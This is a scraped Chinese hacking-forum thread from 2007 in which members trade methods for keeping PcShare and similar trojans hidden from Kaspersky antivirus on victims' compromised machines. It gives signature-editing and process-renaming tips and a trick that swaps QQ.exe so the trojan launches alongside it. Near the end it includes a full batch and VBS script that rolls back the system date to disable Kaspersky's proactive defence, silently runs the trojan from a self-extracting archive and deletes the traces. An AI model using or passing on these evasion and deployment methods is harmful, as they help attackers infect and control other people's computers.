[讨论]关于pcshare的卡巴免杀
[讨论]关于pcshare的卡巴免杀议题作者:hzzlh
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
我已经把pcshare的pchide.sys;pckey.dll;pcclient.dll;pcinit.exe做了免杀,都可以过卡巴。
但是今天突然发现肉鸡不上线了,我就自己做了测试,发现这几个文件还是免杀的,生成客户端也可以执行上线,但是要是进行控制卡巴就会报,而且即使不执行命令,将机子重启之后,卡巴就会将客户端直接卸掉,求助各位高手,这就是卡巴的行为查杀吗?这种情况该怎么做免杀?
补充:我用onlydebug和masm加载这几个文件,再用卡巴内存查杀,仍然查不到病毒。
我在网上查了很多资料,其中有个动画是关于灰鸽子的卡巴行为免杀的,他是用UE把插入的ie进程给改成了别的进程,我也想尝试这种方法,可是搜不到ie(我也是插入ie进程的)。用ollydebug加载之后,再用卡巴查内存,仍然查不到病毒,找不到特征码就没有办法进行免杀。因为不知道是查杀哪个文件,pchide.sys又不能乱改,最好的办法就是找到特征码改特征码。我尝试了很多办法,才来发帖的。另外我想,现在杀软对木马的查杀越来越厉害了,很想大家来讨论一下木马的免杀技术。
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=70676]0[/url] 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=70676]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=鲜花预定&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]爱要怎么说出口[/url]
[url=http://forum.eviloctal.com/space-uid-8918.html]gpd01[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 过卡巴 的主动防御比较难,不过也有办法,BTW,这儿好象不能讨论这个
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=8918]0[/url] 积分9 阅读权限40 在线时间11 小时 注册时间2005-8-4 最后登录2007-2-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=8918]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-64030.html]skyjay[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 没用,就算你过了卡巴主动防,但是交互试保护你不能对肉鸡进行任何操作。
还有为什么LZ是新人可以发帖呢?郁闷的娱乐圈,我很纯洁!!!!
帖子80 精华[url=http://forum.eviloctal.com/digest.php?authorid=64030]0[/url] 积分3137 阅读权限100 性别男 在线时间106 小时 注册时间2006-9-16 最后登录2008-7-14 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=64030]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-68869.html]天狐[/url] [img]http://forum.eviloctal.com/images/avatars/pw/univer4.gif[/img]
晶莹剔透§烈日灼然 笨。你也可以的。發到文章提交区。要是符合发帖的要求才发出来
[url=http://wpa.qq.com/msgrd?V=1&Uin=5771067&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子29 精华[url=http://forum.eviloctal.com/digest.php?authorid=68869]0[/url] 积分92 阅读权限40 在线时间243 小时 注册时间2006-12-14 最后登录2008-6-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=68869]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-70676.html]hzzlh[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第1楼gpd01于2007-01-24 10:26发表的:
过卡巴 的主动防御比较难,不过也有办法,BTW,这儿好象不能讨论这个
是什么办法呢?
有人说可以尝试安装ssm来监视文件调用及中断
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=70676]0[/url] 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=70676]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-68855.html]seaven[/url] [img]http://forum.eviloctal.com/customavatars/68855.jpg[/img]
晶莹剔透§烈日灼然 引用:
引用第2楼skyjay于2007-01-24 11:51发表的:
没用,就算你过了卡巴主动防,但是交互试保护你不能对肉鸡进行任何操作。
还有为什么LZ是新人可以发帖呢?
发主题贴的到文章提交那里发。http://www.seaven.org http://forum.dswhack.com is your friend
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url]
帖子60 精华[url=http://forum.eviloctal.com/digest.php?authorid=68855]0[/url] 积分215 阅读权限40 性别男 在线时间383 小时 注册时间2006-11-28 最后登录2008-7-11 [url=http://www.dswhack.com]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=68855]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-69364.html]control[/url] [img]http://forum.eviloctal.com/images/avatars/pw/samba3.gif[/img]
晶莹剔透§烈日灼然 [s:35] [s:35] 呵呵`
免杀技术因该是允许讨论的```
因为现在很多hack软件都被杀软查杀``
当然hack软件不一定就是干坏事的``
比如说抓包工具WSockExpert,杀软就会杀,导致我们用起来就极其不方便.
呵呵```技术的天堂是允许讨论一切的``!`当然别做坏事就好啦``毕竟hack≠creak
楼主你可以尝试纯汇编免杀哈`````
[s:39]Blog:Www.DayRoad.cn
帖子22 精华[url=http://forum.eviloctal.com/digest.php?authorid=69364]2[/url] 积分89 阅读权限40 在线时间106 小时 注册时间2007-1-10 最后登录2008-4-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=69364]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-70676.html]hzzlh[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 呵呵,有矛才有盾啊 [s:37] [s:36]
仅限技术讨论。。。
如果特征码找不到怎么汇编免杀呢?因为那些文件都已经是免杀的了啊。。。。 [s:35] [s:35]
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=70676]0[/url] 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=70676]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-73074.html]recognize[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 用汇编免杀可以过的,我的灰鸽子就是用汇编的,现在还是免杀的
帖子1 精华[url=http://forum.eviloctal.com/digest.php?authorid=73074]0[/url] 积分6 阅读权限40 性别男 在线时间1 小时 注册时间2007-1-20 最后登录2007-2-12 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=73074]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-31034.html]taiwansee[/url] [img]http://forum.eviloctal.com/customavatars/31034.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 汇编免杀?能过内存查杀吗?
卡巴的主动防御真的很厉害啊,比如远程控制时打开telnet功能,它马上就拦截了,说什么么程序转向之类的一帆风顺并不能磨炼人。
帖子73 精华[url=http://forum.eviloctal.com/digest.php?authorid=31034]2[/url] 积分3255 阅读权限100 性别男 在线时间48 小时 注册时间2006-2-6 最后登录2008-6-6 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=31034]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-6725.html]网络幽灵[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第0楼hzzlh于2007-01-22 17:22发表的:
议题作者:hzzlh
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com]www.eviloctal.com[/url])
我已经把pcshare的pchide.sys;pckey.dll;pcclient.dll;pcinit.exe做了免杀,都可以过卡巴。
但是今天突然发现肉鸡不上线了,我就自己做了测试,发现这几个文件还是免杀的,生成客户端也可以执行上线,但是要是进行控制卡巴就会报,而且即使不执行命令,将机子重启之后,卡巴就会将客户端直接卸掉,求助各位高手,这就是卡巴的行为查杀吗?这种情况该怎么做免杀?
.......
在你控制的时候必然要调用系统的某些函数,这个调用就是一种行为。
咔吧监视到这种被列入危险系列的行为,就进行阻止或询问用户,故
称为行为查杀!!
具体的怎么过,俺也不清楚,^_^,国内有几个分析了一下,我转载他们的文章在
[url=http://forum.eviloctal.com/read-htm-tid-25716-keyword-.html]http://forum.eviloctal.com/read-htm-tid-25716-keyword-.html[/url]
哈哈,好多我都看不懂!
前些时间vxk写了个工具可以击溃咔吧的行为查杀!重启才生效。
个人感觉改特征码,太麻烦了。下边有个思路。
[url=http://netghost.webj.cn/article.asp?id=10]http://netghost.webj.cn/article.asp?id=10[/url]^_^ 社会需求将决定你的价值 ^_^
[url=http://wpa.qq.com/msgrd?V=1&Uin=271689815&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子55 精华[url=http://forum.eviloctal.com/digest.php?authorid=6725]2[/url] 积分231 阅读权限40 性别男 在线时间130 小时 注册时间2005-7-1 最后登录2008-7-10 [url=http://hi.baidu.com/netspirit]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6725]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-65927.html]xiaoyu110[/url] [img]http://forum.eviloctal.com/images/avatars/pw/kawayi3.gif[/img]
晶莹剔透§烈日灼然 要做卡巴的免杀,是不是必须要改变计算机的本生的时间.......才能过卡巴的主动防御。 [s:41]`╭喜╮ `╭欢╮ ╭鉨╮
[url=http://wpa.qq.com/msgrd?V=1&Uin=651181657&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子3 精华[url=http://forum.eviloctal.com/digest.php?authorid=65927]0[/url] 积分13 阅读权限40 性别男 来自江苏连云港市墟沟街 在线时间0 小时 注册时间2006-10-7 最后登录2007-8-5 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=65927]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-40979.html]白白逍遥[/url] [img]http://forum.eviloctal.com/images/avatars/pw/matrix1.jpg[/img]
晶莹剔透§烈日灼然 你发过来,我帮你免杀卡巴,可以试一试过主动 [s:39]白白逍遥 没有不可能
帖子13 精华[url=http://forum.eviloctal.com/digest.php?authorid=40979]0[/url] 积分37 阅读权限40 性别男 来自黑客 在线时间0 小时 注册时间2006-3-24 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40979]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-70676.html]hzzlh[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 现在在测试poison,改了插入的进程后,卡巴确实不会报了,不过在一开始服务端添加自启动的时候卡巴还是会提示操作的。行为查杀。。。。。。。
卡巴主动防御杀手据说可以过卡巴,原理是在木马在运行的时候把卡巴先暂时关闭,之后再开启,但是我没有测试成功,难道是rp问题??。。。。。。
有个想法,干脆弄个自解压,先执行个批处理,批处理就实现把卡巴服务停掉的目的,可是发现net stop根本停不掉卡巴。。。
达人指教。。
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=70676]0[/url] 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=70676]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-6725.html]网络幽灵[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第12楼白白逍遥于2007-02-02 11:26发表的:
你发过来,我帮你免杀卡巴,可以试一试过主动 [s:39]
啥子方法呀兄弟,测试成功没!!^_^ 社会需求将决定你的价值 ^_^
[url=http://wpa.qq.com/msgrd?V=1&Uin=271689815&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子55 精华[url=http://forum.eviloctal.com/digest.php?authorid=6725]2[/url] 积分231 阅读权限40 性别男 在线时间130 小时 注册时间2005-7-1 最后登录2008-7-10 [url=http://hi.baidu.com/netspirit]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6725]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-70352.html]my咖啡[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 卡巴6好象没有类似于启发扫描的模块,对于卡巴的内存杀毒,其实表面过了内存也过了,重点是瑞星的内存杀毒.
要是你以前修改的时候是用填0,那么现在0是没有用的 肉鸡或许不会上线 你在自己电脑上能上线吗?
试试JMP跳区域看看
还有就是 卡巴好象有辅助特征码查杀.
帖子9 精华[url=http://forum.eviloctal.com/digest.php?authorid=70352]0[/url] 积分34 阅读权限40 在线时间15 小时 注册时间2007-1-11 最后登录2008-6-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=70352]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-60773.html]icexiaoye[/url] [img]http://forum.eviloctal.com/customavatars/60773.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
引用第13楼hzzlh于2007-02-02 17:29发表的:
现在在测试poison,改了插入的进程后,卡巴确实不会报了,不过在一开始服务端添加自启动的时候卡巴还是会提示操作的。行为查杀。。。。。。。
卡巴主动防御杀手据说可以过卡巴,原理是在木马在运行的时候把卡巴先暂时关闭,之后再开启,但是我没有测试成功,难道是rp问题??。。。。。。
有个想法,干脆弄个自解压,先执行个批处理,批处理就实现把卡巴服务停掉的目的,可是发现net stop根本停不掉卡巴。。。
.......
卡巴主动防御杀手
- -!
说穿了
就是把系统时间变下
让卡巴暂时死了
等一切都OK列
在把时间调回正常的玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.
[url=http://wpa.qq.com/msgrd?V=1&Uin=119419178&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子728 精华[url=http://forum.eviloctal.com/digest.php?authorid=60773]4[/url] 积分5182 阅读权限100 性别男 在线时间255 小时 注册时间2006-8-7 最后登录2008-7-14 [url=http://icexiaoye.ch]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=60773]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-81757.html]大步[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 卡巴好象用了行为检测技术^^^
用ADS流44吧
[url=http://wpa.qq.com/msgrd?V=1&Uin=55479780&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子8 精华[url=http://forum.eviloctal.com/digest.php?authorid=81757]0[/url] 积分30 阅读权限40 在线时间3 小时 注册时间2007-2-15 最后登录2008-6-21 [url=http://www.uc.a.gg]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=81757]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-47083.html]felifan[/url] [img]http://forum.eviloctal.com/images/avatars/pw/univer3.gif[/img]
晶莹剔透§烈日灼然 [s:75] [s:75] 无奈的事情 尽量的不要运行到它的监视区域吧 以后靠感染运行 不要启动项什么的好了菜鸟无所谓思想最重要
帖子60 精华[url=http://forum.eviloctal.com/digest.php?authorid=47083]0[/url] 积分197 阅读权限40 性别男 在线时间49 小时 注册时间2006-5-5 最后登录2008-5-29 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=47083]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-81757.html]大步[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 不用启动项?
这怎么行
这么着
把QQ.EXE改成QQ2.EXE
木马改成QQ1.EXE
做个批处理
内容为
qq1.exe
qq2.exe
用BAT2EXE把批处理转成EXE程序
改名为QQ.EXE^^^
[url=http://wpa.qq.com/msgrd?V=1&Uin=55479780&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子8 精华[url=http://forum.eviloctal.com/digest.php?authorid=81757]0[/url] 积分30 阅读权限40 在线时间3 小时 注册时间2007-2-15 最后登录2008-6-21 [url=http://www.uc.a.gg]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=81757]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-68147.html]gbbbgbbb[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 主动防御真是让人伤脑筋..............
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=68147]0[/url] 积分9 阅读权限40 在线时间3 小时 注册时间2006-10-25 最后登录2008-3-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=68147]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-70676.html]hzzlh[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 让卡巴主动防御失效的代码:
第一个批量代码
date 1980-01-01
date 1980-01-01
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End
:Next
%systemroot%\temp\你的木马名字.exe
copy %systemroot%\temp\tmp.SCR %systemroot%\system32\
fot %%f in (%temp%.\tmp$$$.vbs*) do del %%f
date 2007-2-17(当地时间)
RD /S /Q %systemroot%\temp\
第2个是vbs代码
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C %systemroot%\temp\ser.bat(第一批量文件名字)", 0, TRUE)
把马+BAT文件+VBS文件 压缩成自解压文件 压的时候选高级-自解压选项 解压路径为%systemroot%\temp\ 然后下面解压后运行 写VBS脚本文件的名字 然后选择格式 安静模式选全部隐藏 覆盖方式选全部覆盖 之后 压缩 运行压缩好的文件就会发现 卡巴的主动防御 失效了 呵呵~~!
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=70676]0[/url] 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=70676]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-32944.html]hellokiddy[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male1.gif[/img]
晶莹剔透§烈日灼然 一个简单的组策略就可以防住所谓的“更改时间让卡巴失效的阴谋”了呵呵 [s:36][img]http://images.rising.com.cn/uploadfiles/20073/3/483382200733203903.jpg[/img]
帖子1 精华[url=http://forum.eviloctal.com/digest.php?authorid=32944]0[/url] 积分6 阅读权限40 在线时间0 小时 注册时间2006-2-17 最后登录2007-3-19 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=32944]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-86508.html]帅得不敢出门[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 我的卡巴经常遇到问题要重启产品 这个不知道是什么问题 要是能利用也是一个方法
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=86508]0[/url] 积分41 阅读权限40 性别男 在线时间13 小时 注册时间2007-3-4 最后登录2008-3-28 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=86508]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-11002.html]ws[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 别人不是白混的。卖钱的太垃圾了谁会要?
页:
[1]